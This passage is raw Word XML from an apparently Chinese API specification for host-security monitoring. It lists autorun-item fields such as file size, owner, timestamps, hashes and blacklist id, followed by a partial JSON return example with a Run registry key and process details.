          <w:p w14:paraId="3DC9E999" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06135AF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自启动</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>项程序</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A097ACD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149E0926" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD1BA78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41EB41E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794BBFC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FFD8008" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B90330" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CBBED74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10914AA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E944B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FBB0403" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B25C085" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325793D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64CFA407" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD4833A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="787D2E0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5495CCEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E32772" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526CEC3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B010B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EC68F32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755C2A5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD25859" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F944670" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765F3D7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A55CC60" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62704036" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="075C49A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A829D66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FDD5D6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55D13301" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788E7E7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D96F4FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7340C899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175C951D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="680FBD4C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559E936A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8A327C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BF84E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="555990AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BFC6A8F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EDDE9E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6262D580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A56B24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590BFD2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AFBE0B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D90C72A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16358095" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D92A44E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB60573" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F13E79C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE7F749" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D0697A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F44C8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27291B95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32A71A77" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A94C9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EED60D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A88287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A442E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="546843C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FAF27D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D973593" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEF082A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79192333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EFC1011" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701248E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autorun_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_md5": "b4884c9fe6c808cfcb48ca6c199815a9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comand_line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_value_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "autorun",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autoruns_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 88576,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00002000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2496,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1528191066,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2636,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
